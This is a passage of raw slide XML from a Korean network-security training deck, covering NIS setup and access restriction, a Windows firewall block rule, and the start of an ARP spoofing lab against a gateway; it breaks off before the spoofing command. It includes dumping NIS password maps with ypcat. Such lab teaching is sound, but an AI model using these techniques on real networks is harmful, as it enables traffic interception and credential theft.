              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ypbind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> start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NIS Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버를 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(ID : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nistest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> / PW : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nistest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # telnet localhost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gn="ctr">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>정상 접속 시 화면</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make -C /var/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>yp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> (-C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>옵션 대문자 사용</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10.10.1.166(NIS Server)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 사용자 추가 등 설정한 내용이 변경되면 해당 정보를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>갱신시켜야</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>현재 실습에서는 이 명령을 실행하지 않아도 실습 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>6. 10.10.1.133(NIS Client)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>NIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버에 등록된 사용자들의 정보를 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ypcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>passwd.byname</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7. exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 이용하여 접속 종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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8. 10.10.1.166(NIS Server)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ypserv.securenets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 수정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ypserv.securenets</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ESC + :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>!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 10.10.1.0~127 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>만 접속 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>9).  NIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/nis restart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재시작 하는 시간이 조금 걸릴 수 있음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</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a:t>10.10.1.133(NIS Client)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버를 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(ID : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nistest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> / PW : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nistest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>* 접속 시 연결이 되지 않는 것을 확인 할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>빨간 네모박스로 체크되어 있는 부분이 정답 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>( 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가지 모두 입력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>* Ctrl + C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 실행하여 중지 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>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1. # check</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14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음 명령어를 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>버전을 바꾸어 준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –set-version Ubuntu 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>15. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변환이 완료되었다면 다음 명령어를 통해 다시 버전을 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>16. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>터미널 상단의 아래방향 화살표를 클릭하여 우분투를 실행시켜준다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/Training/Unit/Net/6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 6. IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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navy03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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IP </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷 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ethernet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>규칙 생성 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(GUI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>제어판 열기</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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>   windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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고급 설정</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인 바운드 규칙</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규칙 종류</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용자 지정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음</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모든 프로그램 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>] </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프로토콜 종류 중 모두를 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음</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ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 다음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소 로 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>] </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추가 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>192.168.10.10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 후 ‘다음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>생성되었는지 확인 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음</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ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 연결 차단 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>] </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모두 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>]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endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이름 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>navy03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>마침</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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err="1"/>
              <a:t>인바운드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 규칙에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>navy03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>방화벽에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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1. # check</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/Training/Unit/Net/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 9. ARP Spoofing</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에서</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(10.10.1.1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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실습 서버에서 공격 서버를 게이트웨이로 인식하도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>스푸핑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 공격을 주기적으로 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
